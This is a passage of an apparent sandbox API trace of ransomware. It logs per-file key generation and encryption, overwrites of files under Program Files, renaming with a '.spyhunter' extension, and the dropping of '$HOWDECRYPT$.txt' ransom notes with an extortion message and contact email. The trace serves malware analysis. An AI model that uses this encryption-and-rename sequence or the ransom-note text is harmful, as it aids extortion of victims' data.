hHeap=0x2c0000) returned 1 [0167.023] GetProcessHeap () returned 0x2c0000 [0167.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.023] GetProcessHeap () returned 0x2c0000 [0167.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecab70 | out: hHeap=0x2c0000) returned 1 [0167.023] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e668 | out: pbBuffer=0x248e668) returned 1 [0167.023] GetProcessHeap () returned 0x2c0000 [0167.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.023] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e660*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e660*=0x30) returned 1 [0167.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 90 [0167.025] StrStrW (lpFirst="Informix.xsl", lpSrch=".txt") returned 0x0 [0167.025] GetProcessHeap () returned 0x2c0000 [0167.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.025] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e624, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e624*=0x2800, lpOverlapped=0x0) returned 1 [0167.172] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.173] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e624, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e624*=0x2800, lpOverlapped=0x0) returned 1 [0167.173] GetProcessHeap () returned 0x2c0000 [0167.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.173] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.173] WriteFile (in: hFile=0x178, lpBuffer=0x248e664*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e624, lpOverlapped=0x0 | out: lpBuffer=0x248e664*, lpNumberOfBytesWritten=0x248e624*=0x4, lpOverlapped=0x0) returned 1 [0167.238] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e624, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e624*=0x30, lpOverlapped=0x0) returned 1 [0167.239] CloseHandle (hObject=0x178) returned 1 [0167.239] GetProcessHeap () returned 0x2c0000 [0167.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.239] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.spyhunter") returned 100 [0167.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.spyhunter")) returned 1 [0167.240] GetProcessHeap () returned 0x2c0000 [0167.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.240] GetProcessHeap () returned 0x2c0000 [0167.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.240] GetProcessHeap () returned 0x2c0000 [0167.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e9c0 | out: hHeap=0x2c0000) returned 1 [0167.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.241] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0167.241] WriteFile (in: hFile=0x178, lpBuffer=0x248e59b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x248e59b*, lpNumberOfBytesWritten=0x248e6c4*=0x127, lpOverlapped=0x0) returned 1 [0167.242] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0167.242] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e6c4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e6c4*=0x2ac, lpOverlapped=0x0) returned 1 [0167.243] CloseHandle (hObject=0x178) returned 1 [0167.243] GetProcessHeap () returned 0x2c0000 [0167.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe880 | out: hHeap=0x2c0000) returned 1 [0167.243] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.244] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0167.244] WriteFile (in: hFile=0x178, lpBuffer=0x248e597*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e6c0, lpOverlapped=0x0 | out: lpBuffer=0x248e597*, lpNumberOfBytesWritten=0x248e6c0*=0x127, lpOverlapped=0x0) returned 1 [0167.244] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0167.244] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e6c0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e6c0*=0x2ac, lpOverlapped=0x0) returned 1 [0167.244] CloseHandle (hObject=0x178) returned 1 [0167.245] GetProcessHeap () returned 0x2c0000 [0167.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0cf0 | out: hHeap=0x2c0000) returned 1 [0167.245] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e660 | out: pbBuffer=0x248e660) returned 1 [0167.245] GetProcessHeap () returned 0x2c0000 [0167.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.245] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e658*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e658*=0x30) returned 1 [0167.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.246] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html") returned 49 [0167.246] StrStrW (lpFirst="Welcome.html", lpSrch=".txt") returned 0x0 [0167.246] GetProcessHeap () returned 0x2c0000 [0167.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.246] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e61c*=0x3d7, lpOverlapped=0x0) returned 1 [0167.394] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.394] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3d7, lpNumberOfBytesWritten=0x248e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e61c*=0x3d7, lpOverlapped=0x0) returned 1 [0167.394] GetProcessHeap () returned 0x2c0000 [0167.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.394] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.394] WriteFile (in: hFile=0x178, lpBuffer=0x248e65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e61c, lpOverlapped=0x0 | out: lpBuffer=0x248e65c*, lpNumberOfBytesWritten=0x248e61c*=0x4, lpOverlapped=0x0) returned 1 [0167.394] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e61c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e61c*=0x30, lpOverlapped=0x0) returned 1 [0167.394] CloseHandle (hObject=0x178) returned 1 [0167.394] GetProcessHeap () returned 0x2c0000 [0167.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.394] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.spyhunter") returned 59 [0167.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html.spyhunter")) returned 1 [0167.395] GetProcessHeap () returned 0x2c0000 [0167.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.395] GetProcessHeap () returned 0x2c0000 [0167.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.396] GetProcessHeap () returned 0x2c0000 [0167.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe7d0 | out: hHeap=0x2c0000) returned 1 [0167.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.397] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0167.397] WriteFile (in: hFile=0x178, lpBuffer=0x248e58f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e6b8, lpOverlapped=0x0 | out: lpBuffer=0x248e58f*, lpNumberOfBytesWritten=0x248e6b8*=0x127, lpOverlapped=0x0) returned 1 [0167.398] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0167.398] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e6b8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e6b8*=0x2ac, lpOverlapped=0x0) returned 1 [0167.398] CloseHandle (hObject=0x178) returned 1 [0167.398] GetProcessHeap () returned 0x2c0000 [0167.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7dce0 | out: hHeap=0x2c0000) returned 1 [0167.399] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e658 | out: pbBuffer=0x248e658) returned 1 [0167.399] GetProcessHeap () returned 0x2c0000 [0167.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.399] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e650*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e650*=0x30) returned 1 [0167.399] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.400] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT") returned 59 [0167.400] StrStrW (lpFirst="YST9YDT", lpSrch=".txt") returned 0x0 [0167.400] GetProcessHeap () returned 0x2c0000 [0167.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0167.400] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e614*=0x8f0, lpOverlapped=0x0) returned 1 [0167.432] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff710, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.432] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x248e614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e614*=0x8f0, lpOverlapped=0x0) returned 1 [0167.433] GetProcessHeap () returned 0x2c0000 [0167.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0167.433] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.433] WriteFile (in: hFile=0x178, lpBuffer=0x248e654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e614, lpOverlapped=0x0 | out: lpBuffer=0x248e654*, lpNumberOfBytesWritten=0x248e614*=0x4, lpOverlapped=0x0) returned 1 [0167.433] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e614, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e614*=0x30, lpOverlapped=0x0) returned 1 [0167.433] CloseHandle (hObject=0x178) returned 1 [0167.433] GetProcessHeap () returned 0x2c0000 [0167.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.433] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT.spyhunter") returned 69 [0167.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt.spyhunter")) returned 1 [0167.453] GetProcessHeap () returned 0x2c0000 [0167.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.453] GetProcessHeap () returned 0x2c0000 [0167.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.453] GetProcessHeap () returned 0x2c0000 [0167.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8338 | out: hHeap=0x2c0000) returned 1 [0167.453] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e650 | out: pbBuffer=0x248e650) returned 1 [0167.453] GetProcessHeap () returned 0x2c0000 [0167.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.453] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e648*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e648*=0x30) returned 1 [0167.454] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.454] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5") returned 56 [0167.454] StrStrW (lpFirst="EST5", lpSrch=".txt") returned 0x0 [0167.454] GetProcessHeap () returned 0x2c0000 [0167.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0167.454] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e60c*=0x1b, lpOverlapped=0x0) returned 1 [0167.455] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.455] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e60c*=0x1b, lpOverlapped=0x0) returned 1 [0167.455] GetProcessHeap () returned 0x2c0000 [0167.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0167.455] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.456] WriteFile (in: hFile=0x178, lpBuffer=0x248e64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e60c, lpOverlapped=0x0 | out: lpBuffer=0x248e64c*, lpNumberOfBytesWritten=0x248e60c*=0x4, lpOverlapped=0x0) returned 1 [0167.456] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e60c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e60c*=0x30, lpOverlapped=0x0) returned 1 [0167.456] CloseHandle (hObject=0x178) returned 1 [0167.456] GetProcessHeap () returned 0x2c0000 [0167.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.456] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5.spyhunter") returned 66 [0167.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5.spyhunter")) returned 1 [0167.457] GetProcessHeap () returned 0x2c0000 [0167.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.457] GetProcessHeap () returned 0x2c0000 [0167.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.457] GetProcessHeap () returned 0x2c0000 [0167.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7d38 | out: hHeap=0x2c0000) returned 1 [0167.457] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e650 | out: pbBuffer=0x248e650) returned 1 [0167.457] GetProcessHeap () returned 0x2c0000 [0167.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.457] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e648*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e648*=0x30) returned 1 [0167.457] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.479] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT") returned 59 [0167.479] StrStrW (lpFirst="CST6CDT", lpSrch=".txt") returned 0x0 [0167.479] GetProcessHeap () returned 0x2c0000 [0167.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0167.479] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e60c*=0x8f0, lpOverlapped=0x0) returned 1 [0167.553] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff710, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.553] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x248e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e60c*=0x8f0, lpOverlapped=0x0) returned 1 [0167.553] GetProcessHeap () returned 0x2c0000 [0167.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: 